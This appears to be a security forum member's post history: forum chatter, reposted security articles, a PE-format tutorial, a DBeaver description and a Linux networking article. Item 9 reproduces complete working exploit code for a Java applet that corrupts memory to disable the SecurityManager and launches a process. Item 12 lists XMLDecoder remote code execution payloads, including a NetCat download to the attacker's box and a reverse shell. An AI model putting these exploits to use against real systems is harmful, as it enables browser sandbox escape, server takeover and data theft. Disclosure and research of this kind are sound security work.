Nytro

Administrators
Everything posted by Nytro

  1. Yes, I looked through the source too, and obviously it's not complete. It's an attempt to rewrite the Windows XP operating system from scratch. The chances of success are extremely slim, given that: 1. It's an EXTREMELY complex project. 2. The knowledge required to contribute is at a beyond-advanced level. 3. Very few people are able to contribute, and even fewer actually do. Many years will pass before a stable version is reached, and that's assuming the project continues at all. Still, it has real value: it's very interesting to read through the source code and understand how the Windows kernel works.
  2. I spent about two minutes at the window myself but didn't see anything. Roughly how often do they appear? One every 5-10 minutes, or less often than that?
  3. What do you mean, 24/48? I think that salary is below the legal minimum wage; I doubt it's even legal to pay that little. What job is this? At Carrefour, Cora or Kaufland it's probably better. In programming, even internships and part-time positions pay upwards of 1000 RON.
  4. What was the problem, that we only accept projects built from scratch and reject copied sources? Actually, around here you get banned for that, not just kept out of RST Power. Build something modest, but build it yourself; you don't grab some code off Google, slap "by Blondas" on it and call yourself a programmer. Well, in your case you took code from several sources and pasted it all into one place. Which amounts to the same thing: zero.
  5. RST is on the first page of search results for "invitatie filelist", "invitatii filelist", "cont filelist". Just as many users who landed here searching for "Conquiztador killer" went on to grow, we hope the wave of users arriving here with those searches will learn new things and grow as well.
  6. Researchers demonstrate how IPv6 can easily be used to perform MitM attacks

Many devices simply waiting for router advertisements, good or evil.

When early last year I was doing research for an article on IPv6 and security, I was surprised to learn how easy it was to set up an IPv6 tunnel into an IPv4-only environment. I expected this could easily be used in various nefarious ways. I was reminded of this when I read about a DEFCON presentation on using IPv6 to perform a man-in-the-middle attack on an IPv4-connected machine.

I did not attend DEFCON, but the presenters Brent Bandelgar and Scott Behrens provided details in a blog post for their company Neohapsis as well as in their presentation slides. Moreover, they shared the source code of the tool they developed on GitHub. The attack refines a proof of concept described in 2011, making it work against Windows 8 as well and providing a bash script that is supposed to work out of the box. This script will no doubt be popular among penetration testers, but it also shows possibilities for those with malicious motives.

For me, the script didn't work right away, but some minor tweaks got it working, after which the traffic from my wife's Windows 7 laptop was flowing through my virtual Ubuntu server. And while I didn't even attempt to read the traffic generated by this 'husband-in-the-middle' attack, I could have done so. I could also have performed a similar attack in a local Starbucks.

The attack makes use of the fact that all modern operating systems support both IPv4 and IPv6 connections. This in itself is a good thing for the migration towards IPv6, as is the fact that the IPv6 connection, if available, takes precedence. Moreover, operating systems such as Windows 7 and 8 have DHCPv6, the IPv6 version of DHCP, enabled by default. This means that if they haven't already got an IPv6 connection, they will obtain one from any DHCPv6 server running on the local network.
This is what the Neohapsis researchers do to get machines to connect to their device. As this merely allows them to capture IPv6 traffic in an IPv4-only network, they then use a protocol called NAT64 to allow their server to route this traffic to the IPv4 Internet. NAT64 is one of several protocols used to make the migration towards IPv6 easier: it allows IPv6-only networks to connect to IPv4-only services on the Internet.

[Figure: NAT64 in a rogue set-up, with the NAT64 server on the right.]

It works by setting up a DNS server that returns IPv6 addresses in which the IPv4 address is embedded. If a request is made for the AAAA record (IPv6 address) of a domain, the response will be an address in some predefined /96 IPv6 subnet - that is, a subnet in which all but the final 32 bits are fixed. These 32 bits will be the A record (IPv4 address) for the same domain. Say, for example, the subnet is 2001:db9:1:ffff::/96 and a request is made for the Virus Bulletin website; then the response will be 2001:db9:1:ffff::6dc8:041a. Indeed, 6dc8:041a is the hexadecimal representation of 109.200.4.26, the IPv4 address of the Virus Bulletin site.

Requests to this IPv6 address will then be routed through the server running NAT64 - in this case, the server set up by the attackers. They are thus able to see all traffic from the now IPv6-connected machine, except traffic in which the IP address is hard-coded. Of course, in principle this means they can only read traffic that isn't encrypted, but that still allows for many possible attacks with serious consequences. At the same time, the fact that the intercepting device runs on the same local network might make performing cryptographic timing attacks such as Lucky Thirteen easier.

To see the possibilities for malware that is able to intercept all traffic, one just needs to look at a 2011 variant of the TDSS rootkit, which set up its own IPv4 DHCP server.
In that case, however, the malware had to compete with the real DHCP server, while in this case the fact that IPv6 always takes precedence over IPv4 means there is no such competition.

The simplest way to fend off this kind of attack is to turn off IPv6 on devices that do not need it. This will, of course, hinder the migration towards IPv6, and it may not be an option for portable devices, as these may sometimes find themselves in an environment where IPv6 connectivity is needed. The researchers also mention RFC 6105, an informational document published by the IETF on how to deal with rogue router advertisements, as a possible defence strategy. But ultimately, the best way to defend against these kinds of attacks is to make sure the device always has an IPv6 connection. Attacks such as this one will not work on devices that are already IPv6-connected.

Source: Virus Bulletin : Blog - Researchers demonstrate how IPv6 can easily be used to perform MitM attacks

See the links.
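The address-embedding scheme described above is easy to check for yourself. Below is a minimal Java sketch (the class and method names are mine; the /96 prefix and the 109.200.4.26 address are the article's example): the rogue DNS server does essentially this for every AAAA query it answers.

```java
import java.net.InetAddress;

public class Nat64Synth {
    // Embed an IPv4 address into the low 32 bits of a /96 NAT64 prefix,
    // as a NAT64 DNS server does when synthesizing AAAA records.
    static String synthesize(String prefix96, String ipv4) throws Exception {
        byte[] v6 = InetAddress.getByName(prefix96).getAddress(); // 16 bytes
        byte[] v4 = InetAddress.getByName(ipv4).getAddress();     // 4 bytes
        System.arraycopy(v4, 0, v6, 12, 4); // final 32 bits = the A record
        return InetAddress.getByAddress(v6).getHostAddress();
    }

    public static void main(String[] args) throws Exception {
        // The article's example: 109.200.4.26 inside 2001:db9:1:ffff::/96
        System.out.println(synthesize("2001:db9:1:ffff::", "109.200.4.26"));
        // 6dc8 = 109.200 and 041a = 4.26 in hex, matching the article
    }
}
```

Java prints the result in uncompressed form (`2001:db9:1:ffff:0:0:6dc8:41a`), which is the same address as the article's `2001:db9:1:ffff::6dc8:041a`.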
  7. Because the code is written in C, not C++. Mirror: http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf
  8. Mirror: http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf
  9. Oracle Java storeImageArray() Invalid Array Indexing Code Execution

Site: packetstormsecurity.com

Oracle Java versions prior to 7u25 suffer from an invalid array indexing vulnerability that exists within the native storeImageArray() function inside jre/bin/awt.dll. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program.

```java
import java.awt.image.*;
import java.awt.color.*;
import java.beans.Statement;
import java.security.*;

public class MyJApplet extends javax.swing.JApplet {

    /**
     * Initializes the applet myJApplet
     */
    @Override
    public void init() {
        /* Set the Nimbus look and feel */
        //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
         */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        }
        //</editor-fold>

        /* Create and display the applet */
        try {
            java.awt.EventQueue.invokeAndWait(new Runnable() {
                public void run() {
                    initComponents();
                    // print environment info
                    logAdd("JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version")
                        + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version")
                        + "\nJava Plug-in: " + System.getProperty("javaplugin.version")
                        + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch")
                        + " (" + System.getProperty("os.version") + ")");
                }
            });
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public void logAdd(String str) {
        txtArea.setText(txtArea.getText() + str + "\n");
    }

    public void logAdd(Object o, String... str) {
        logAdd((str.length > 0 ? str[0] : "") + (o == null ? "null" : o.toString()));
    }

    public String errToStr(Throwable t) {
        String str = "Error: " + t.toString();
        StackTraceElement[] ste = t.getStackTrace();
        for (int i = 0; i < ste.length; i++) {
            str += "\n\t" + ste[i].toString();
        }
        t = t.getCause();
        if (t != null) str += "\nCaused by: " + errToStr(t);
        return str;
    }

    public void logError(Exception ex) {
        logAdd(errToStr(ex));
    }

    public static String toHex(int i) {
        return Integer.toHexString(i);
    }

    /**
     * This method is called from within the init() method to initialize the
     * form. WARNING: Do NOT modify this code. The content of this method is
     * always regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {
        btnStart = new javax.swing.JButton();
        jScrollPane2 = new javax.swing.JScrollPane();
        txtArea = new javax.swing.JTextArea();

        btnStart.setText("Run calculator");
        btnStart.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mousePressed(java.awt.event.MouseEvent evt) {
                btnStartMousePressed(evt);
            }
        });

        txtArea.setEditable(false);
        txtArea.setColumns(20);
        txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N
        txtArea.setRows(5);
        txtArea.setTabSize(4);
        jScrollPane2.setViewportView(txtArea);

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE)
                .addContainerGap())
            .addGroup(layout.createSequentialGroup()
                .addGap(242, 242, 242)
                .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
                .addComponent(btnStart)
                .addContainerGap())
        );
    }// </editor-fold>//GEN-END:initComponents

    private boolean _isMac = System.getProperty("os.name", "").contains("Mac");
    private boolean _is64 = System.getProperty("os.arch", "").contains("64");

    // we will need a ColorSpace which returns 1 from getNumComponents()
    class MyColorSpace extends ICC_ColorSpace {
        public MyColorSpace() {
            super(ICC_Profile.getInstance(ColorSpace.CS_sRGB));
        }

        // override getNumComponents
        public int getNumComponents() {
            int res = 1;
            //logAdd("MyColorSpace.getNumComponents() = " + res);
            return res;
        }
    }

    // we will need a ComponentColorModel with an obedient isCompatibleRaster() which always returns true.
    class MyColorModel extends ComponentColorModel {
        public MyColorModel() {
            super(new MyColorSpace(), new int[]{8, 8, 8}, false, false, 1, DataBuffer.TYPE_BYTE);
        }

        // override isCompatibleRaster
        public boolean isCompatibleRaster(Raster r) {
            boolean res = true;
            logAdd("MyColorModel.isCompatibleRaster() = " + res);
            return res;
        }
    }

    private int tryExpl() {
        try {
            // alloc aux vars
            String name = "setSecurityManager";
            Object[] o1 = new Object[1];
            Object o2 = new Statement(System.class, name, o1); // make a dummy call for init

            // allocate byte buffer for destination Raster
            DataBufferByte dst = new DataBufferByte(16);
            // allocate the target array right after dst
            int[] a = new int[8];
            // allocate an object array right after a[]
            Object[] oo = new Object[7];

            // create Statement with the restricted AccessControlContext
            oo[2] = new Statement(System.class, name, o1);

            // create powerful AccessControlContext
            Permissions ps = new Permissions();
            ps.add(new AllPermission());
            oo[3] = new AccessControlContext(
                new ProtectionDomain[]{
                    new ProtectionDomain(
                        new CodeSource(
                            new java.net.URL("file:///"),
                            new java.security.cert.Certificate[0]
                        ),
                        ps
                    )
                }
            );

            // store System.class pointer in oo[]
            oo[4] = ((Statement) oo[2]).getTarget();

            // save old a.length
            int oldLen = a.length;
            logAdd("a.length = 0x" + toHex(oldLen));

            // create regular source image
            BufferedImage bi1 = new BufferedImage(4, 1, BufferedImage.TYPE_INT_ARGB);
            logAdd(bi1);

            // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length
            MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 44 + (_is64 ? 8 : 0));

            // create malformed destination image based on dst[] data
            WritableRaster wr = Raster.createWritableRaster(sm, dst, null);
            BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null);
            logAdd(bi2);

            // prepare first pixel which will overwrite a.length
            bi1.getRaster().setPixel(0, 0, new int[]{-1, -1, -1, -1});

            // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c)
            AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1, 0, 0, 1, 0, 0), null);
            op.filter(bi1, bi2);

            // check results: a.length should be overwritten by 0xFFFFFFFF
            int len = a.length;
            logAdd("a.length = 0x" + toHex(len));
            if (len == oldLen) {
                // check a[] content corruption
                // for RnD
                for (int i = 0; i < len; i++)
                    if (a[i] != 0) logAdd("a[" + i + "] = 0x" + toHex(a[i]));
                // exit
                logAdd("error 1");
                return 1;
            }

            // ok, now we can read/write outside the real a[] storage,
            // lets find our Statement object and replace its private "acc" field value

            // search for oo[] after a[oldLen]
            boolean found = false;
            int ooLen = oo.length;
            for (int i = oldLen + 2; i < oldLen + 32; i++)
                if (a[i - 1] == ooLen && a[i] == 0 && a[i + 1] == 0       // oo[0]==null && oo[1]==null
                    && a[i + 2] != 0 && a[i + 3] != 0 && a[i + 4] != 0   // oo[2,3,4] != null
                    && a[i + 5] == 0 && a[i + 6] == 0)                   // oo[5,6] == null
                {
                    // read pointer from oo[4]
                    int stmTrg = a[i + 4];
                    // search for the Statement.target field behind oo[]
                    for (int j = i + 7; j < i + 7 + 64; j++) {
                        if (a[j] == stmTrg) {
                            // overwrite default Statement.acc by oo[3] ("AllPermission")
                            a[j - 1] = a[i + 3];
                            found = true;
                            break;
                        }
                    }
                    if (found) break;
                }

            // check results
            if (!found) {
                // print the memory dump on error
                // for RnD
                String s = "a[" + oldLen + "...] = ";
                for (int i = oldLen; i < oldLen + 32; i++) s += toHex(a[i]) + ",";
                logAdd(s);
            } else try {
                // show current SecurityManager
                logAdd(System.getSecurityManager(), "Security Manager = ");
                // call System.setSecurityManager(null)
                ((Statement) oo[2]).execute();
                // show results: SecurityManager should be null
                logAdd(System.getSecurityManager(), "Security Manager = ");
            } catch (Exception ex) {
                logError(ex);
            }
            logAdd(System.getSecurityManager() == null ? "Ok." : "Fail.");
        } catch (Exception ex) {
            logError(ex);
        }
        return 0;
    }

    private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed
        try {
            logAdd("===== Start =====");
            // try several attempts to exploit
            for (int i = 1; i <= 5 && System.getSecurityManager() != null; i++) {
                logAdd("Attempt #" + i);
                tryExpl();
            }
            // check results
            if (System.getSecurityManager() == null) {
                // execute payload
                Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator" : "calc.exe");
            }
            logAdd("===== End =====");
        } catch (Exception ex) {
            logError(ex);
        }
    }//GEN-LAST:event_btnStartMousePressed

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JButton btnStart;
    private javax.swing.JScrollPane jScrollPane2;
    private javax.swing.JTextArea txtArea;
    // End of variables declaration//GEN-END:variables
}
```

Download: http://packetstormsecurity.com/files/download/122777/PSA-2013-0811-1-exploit.tgz

Source: Oracle Java storeImageArray() Invalid Array Indexing Code Execution ? Packet Storm
  10. Right, and how many terrorists and criminals have those clowns actually caught that way?
  11. ATM manufacturer pays respects to hacker who broke into its systems

Both Barnaby Jack and Triton showed how white-hat hacking should be done.

A tribute to the late Barnaby Jack by the company whose systems he hacked shows how hackers can really help make the world a safer place. When New Zealand hacker Barnaby Jack suddenly died last month, the Internet was awash with tributes to the man probably best known for the "jackpotting" attack on ATMs he demonstrated at the Black Hat conference in 2010. The tributes demonstrated that Jack, who was due to speak at Black Hat this year on hacking pacemakers, was both loved and respected in the security community. His sister wrote the touching words "I was always so proud. Seems I'm not the only one."

Yesterday, I spotted another tribute, by Henry Schwarz of Triton. Triton produces ATMs - the very machines whose security Jack demonstrated wasn't up to date. Many in Triton's position would have ignored or denied the problem, and perhaps even attempted to prevent Jack from speaking about the hack (as happened recently to researchers who had broken security codes in expensive cars). Instead, Triton did the only right thing: the company reached out to Jack and worked with him on improving the security of its systems.

Jack, too, could have made the wrong decision: it doesn't require much imagination to understand how his ATM-hacking skills could easily have made him a lot of money. But he informed the ATM vendors about the attack, worked with them to solve the issues, and delayed a presentation about it until after a patch had been rolled out. He even decided not to disclose the how-to of the attack.

It isn't always easy to explain to the general public how white-hat hackers, when they go on stage and demonstrate what to most people looks like a clear criminal act, really help make the world a safer place. Perhaps we should tell them the story of Barnaby Jack and Triton.

Schwarz finishes his tribute by writing "Barnaby and I started as adversaries and ended as friends. Our heartfelt condolences to his family and loved ones." We, of course, share that sentiment.

Source: Virus Bulletin : Blog - ATM manufacturer pays respects to hacker who broke into its systems
  12. [h=3]Using XMLDecoder to execute server-side Java code on a Restlet application (i.e. Remote Command Execution)[/h]

At the DefCon REST presentation we did last week (see slides here), after the Neo4j CSRF payload demo that starts processes (calc and nc) on the server, we also showed how dangerous Java's XMLDecoder can be. (tl;dr: scroll to the end of the article to see how to create an XML file that will trigger a reverse shell from a REST server into an attacker's box.)

I have to say that I was quite surprised that it was possible to execute Java code (and start processes) from XML files! Abraham and Alvaro deserve all the credit for connecting the dots between XMLDecoder and REST.

Basically, what happens is that the Java JDK has a feature called Long Term Persistence which can be used like this: ... As you can see from the example shown above, the XML provided to the XMLDecoder API is able to create an instance of javax.swing.JButton and invoke its methods. I can see why this is useful and why it was added to the JDK (since it allows for much better 'Long Term Object Persistence'), BUT, in practice, what this means is that Java payloads can be inserted into XML files/messages. This is already dangerous in most situations (i.e. when was the last time you actually thought that an XML file was able to trigger code execution on a server), BUT when you add REST to the mix, we basically have a 'Remote Code/Command Execution' vulnerability.

Awareness of this issue

Although there is some awareness out there of the dangers of XMLDecoder, I don't think there is enough understanding of what it is possible to do with the XML provided to the XMLDecoder. For example, 'Is it safe to use XMLDecoder to read document files?' asks: ... with the answer being spot on: ... Unfortunately, one really has to look for those 'alerts', since the main XMLDecoder info/documentation doesn't mention them. For example, the main links you get by searching for XMLDecoder: ... encourage its use: ... and provide no info on the 'remote code execution' feature of XMLDecoder.

Connecting the dots: using XMLDecoder in a REST API

There are two key scenarios where this 'feature' becomes a spectacular vulnerability:
- server-side backend systems that process attacker-controlled XML files using XMLDecoder
- REST APIs that use XMLDecoder to create strongly typed objects from the HTTP request data

And the second case is exactly what happens with the Restlet REST API, which wraps XMLDecoder in its org.restlet.representation.ObjectRepresentation<T> feature/class. Note how the documentation page: ... makes no reference to the dangerous use of XMLDecoder (ironically, it doesn't even mention XMLDecoder, just that it can parse data created by XMLEncoder).

How XMLDecoder is used in Restlet

In Restlet, the ObjectRepresentation<T> class can be used in REST methods to create objects from the HTTP request body (which is an XML string). For example, in the PoC that we created for the DefCon presentation (based on one of the Restlet source code example apps) ... I changed the code at line 68 (which manually retrieved data from the HTTP request data) ... into the code you can see below at line 72 ... which uses ObjectRepresentation<T> to map the HTTP request data into an object of type Item.

Note that this is exactly the capability provided by MVC frameworks that automagically bind HTTP POST data into model objects. This 'feature' is the one that creates the Model Binding vulnerabilities which I have been talking about here, here, here, here, here, here, here and here. In fact, the XMLDecoder case is a Model Binding vulnerability (also called Over Posting, Mass Assignment or Auto Binding vulns) on steroids, since not only can we put data in that object, we can create completely new ones and invoke methods on them.

Before you read the exploits, remember that the change I made to the code (see below) ... is one that any developer could make if tasked with automatically casting the received REST XML data into objects. In order to develop the exploits and create PoCs, I quickly wrote an O2 Platform based tool, which you can get from here: ... This tool: ... provided a GUI where these XML exploits: ... could be easily sent to a running instance of the test Restlet app.

Multiple examples of what can be done using the XMLDecoder meta-language:

1 - create item (Simple).xml - normal object creation
2 - create item (using properties).xml - object creation and calling setters
3 - create item (from var).xml - creating and using a variable
4 - create item (and more).xml - creating/invoking a completely different class
5 - create item (and calc).xml - starting calc.exe using Java's Runtime.getRuntime(). Note that this example is VERY stealthy, since no casting error is thrown by the XMLDecoder conversion (the first object created in the XML execution is the one returned, which in this case is the expected one (firstResource.Item))
6 - Process Builder - Start a Calc.xml - create a completely different object (ProcessBuilder), which will throw a casting error ... after the process execution starts
7a - Creating a File.xml - in the target app we were using, there was no webroot available with the ability to render JSPs (it was a pure REST server with only REST routes). But if there was one, and we could write to it, we could use the technique shown below to upload a JSP shell (like this one) and exploit the server from there.
7b - Creating a Class File.xml - since we can upload files, we can compile a class file locally and 'upload' it to the server
7d - execution class file - anotherExecute - calc.xml - in this case the class file we uploaded had a method that could be used to start processes
8a - HttpResponse - return variable.xml - this is a cool technique where I found the Restlet equivalent of HttpServletResponse, so I was able to write content directly to the current browser
8b - HttpResponse - return variables.xml - which can be used to return data assigned to XMLDecoder-created variables
8c - HttpResponse - return JavaProperties.xml - in this case the java.lang.System.getProperties values (but if this was a real app, we could use this to extract data from the database or from in-memory objects)
8d - Exploit - Create XSS.xml - another option is to trigger XSS on the current user (useful if the first payload was delivered over CSRF to the victim)
8e - HttpResponse - execute process - read two lines.xml - here is a way to execute a process and get its output shown in the browser
9a - download NetCat.xml - here is how to trigger an HTTP connection from the server to the attacker's box and download the NetCat tool
9b - Start NetCat reverse shell.xml - once NetCat is available on the server, we can use it to send a reverse shell to an external IP:Port

This is when I ran out of time for writing more PoCs... but as you can see by the end, I was just about writing Java code; the only thing I didn't figure out was how to create loops and anonymous methods/classes (I need to look at the Command Pattern). I also hope that by now you see how dangerous the XMLDecoder capabilities are, and that its use must be VERY, VERY carefully analysed and protected.

How can XMLDecoder be used safely?

I'm not entirely sure at the moment. The Secure Coding Guidelines for the Java Programming Language, Version 4.0 have a note on 'Long Term Persistence of JavaBeans': ... But the 'Long Term Persistence of JavaBeans Components: XML Schema' article (which, by the way, is the best resource out there on how to use XMLDecoder) has no mention of security.

Hopefully the presentation that we did at DefCon and blog posts like this will raise awareness of this issue, and good solutions will emerge. Note that I'm not as good at Java as I am at .NET, so I'm sure there is something in Java or the JDK that I'm missing. Let me know what you think of this issue, whether there are safe ways to use XMLDecoder, and if you spot other dangerous uses of XMLDecoder.

UPDATE: see this page for the presentation slides (hosted on SlideShare).

Dinis Cruz at 13:33

Source: Dinis Cruz Blog: Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)
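For illustration, here is roughly what an XMLDecoder payload of the kind described above looks like (a sketch modeled on the 'Process Builder - Start a Calc' example; the exact files shipped with the PoC tool may differ, and the version attribute is arbitrary). When a server feeds this document to XMLDecoder, the decoder instantiates java.lang.ProcessBuilder with the given argument array and then invokes its start() method, launching the process:

```
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="1">
      <void index="0"><string>calc.exe</string></void>
    </array>
    <void method="start"/>
  </object>
</java>
```

Nothing in this document is "data" in the usual sense: the <object>, <array> and <void method="..."> elements are instructions to the decoder, which is exactly why attacker-controlled XML must never reach XMLDecoder.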
  13. @Byte-ul I was supposed to defend my bachelor's thesis this summer, but I didn't pass all my exams, so I still have to wait. I can't say what it's about, only that it's related to PE files. When it's ready, probably this winter, unless I change the topic, I'll post it here with all the necessary information. @bobi_m6 Thanks for the advice, I'll keep it in mind when I write the final version of the theory part of my thesis. It actually didn't look like this at first, it wasn't so "personal", but I turned it into a tutorial so that everyone can understand it better. @Matt This is the final version. It's not a complete article on what the "PE structure" is, but I hope to write a second part in the future with the necessary additions.
  14. [RST] Tutorial - Formatul fisierelor PE (The PE File Format)

This tutorial is essentially part of the "theory" for my bachelor's thesis. The article is not complete; it is aimed at beginners, and I hope everyone will understand what it is about. Have you ever wondered what an executable file (.exe) or a function library (.dll) contains? Here you will find some basic notions.

Contents:
- General format
- The MS-DOS header
- The MS-DOS stub program
- The PE headers
- The section table

If you have questions, don't hesitate to post them.

Download:
https://rstforums.com/proiecte/Formatul_Fisierelor_PE.pdf
http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf
http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf

Thanks
  15. He was probably pressured by the "merry men"... Little by little, we're losing control over what used to be "our world".
  16. DBeaver - Universal Database Manager

Overview

DBeaver is a free and open-source (GPL) universal database tool for developers and database administrators. Usability is the main goal of this project; the program UI is carefully designed and implemented. It is freeware. It is multiplatform. It is based on an open-source framework and allows writing of various extensions (plugins). It supports any database having a JDBC driver. It may handle any external data source which may or may not have a JDBC driver. There is a set of plugins for certain databases (MySQL and Oracle in version 1.x) and different database management utilities (e.g. ERD).

Supported (tested) databases: MySQL, Oracle, PostgreSQL, IBM DB2, Microsoft SQL Server, Sybase, ODBC, Java DB (Derby), Firebird (Interbase), HSQLDB, SQLite, Mimer, H2, IBM Informix, SAP MaxDB, Cache, Ingres, Linter, Teradata, Vertica, and any JDBC-compliant data source.

Supported OSes: Windows (2000/XP/2003/Vista/7), Linux, Mac OS, Solaris, AIX, HP-UX.

General features: database metadata browsing; metadata editor (tables, columns, keys, indexes); SQL statement/script execution; SQL highlighting (specific to each database engine); autocompletion and metadata hyperlinks in the SQL editor; result set/table editing; BLOB/CLOB support (view and edit modes); scrollable result sets; data (tables, query results) export; transaction management; search across database objects (tables, columns, constraints, procedures); ER diagrams; database object bookmarks; SQL script management; projects (connections, SQL scripts and bookmarks).

MySQL plugin features: Enum/Set data types; procedure/trigger view; metadata DDL view; session management; user management; catalog management; advanced metadata editor.

Oracle plugin features: XML and Cursor data type support; browsing/editing of packages, procedures, triggers, indexes, tablespaces and other metadata objects; metadata DDL view; session management; user management; advanced metadata editor.

Other benefits: DBeaver consumes much less memory than other popular similar software (SQuirreL, DbVisualizer); database metadata is loaded on demand, so there is no long-running "metadata caching" procedure at connect time; the result set viewer (grid) is very fast and consumes very little memory; all remote database operations work in non-blocking mode, so DBeaver does not hang if the database server does not respond or there is a network issue.

License

DBeaver is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. DBeaver is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Contacts

Technical support - support@jkiss.org
Technical support, feature suggestions and any other questions - serge@jkiss.org

Download: http://dbeaver.jkiss.org/download/

Source: DBeaver - Universal Database Manager
  17. Queueing in the Linux Network Stack

[A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.]

Packet queues are a core component of any network stack or device. They allow asynchronous modules to communicate, increase performance, and have the side effect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency-reducing features such as BQL operate, and how to control buffering for reduced latency. The figure below will be referenced throughout, and modified versions will be presented to illustrate specific concepts.

Figure 1 – Simplified high-level overview of the queues on the transmit path of the Linux network stack

Driver Queue (aka ring buffer)

Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed-size buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs), which hold the packet data and are used throughout the kernel.

Figure 2 – Partially full driver queue with descriptors pointing to SKBs

The input source for the driver queue is the IP stack, which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission.

The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission.
That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous, this design wastes valuable transmission opportunities, resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work.

Huge Packets from the Stack

Most NICs have a fixed maximum transmission unit (MTU), which is the biggest frame that can be transmitted by the physical medium. For Ethernet the default MTU is 1,500 bytes, but some Ethernet networks support jumbo frames of up to 9,000 bytes. Inside the IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep each packet at or below the 1,500-byte MTU. For large data transfers the comparatively small MTU causes a large number of small packets to be created and transferred through the driver queue.

In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,536 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface.
For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue.

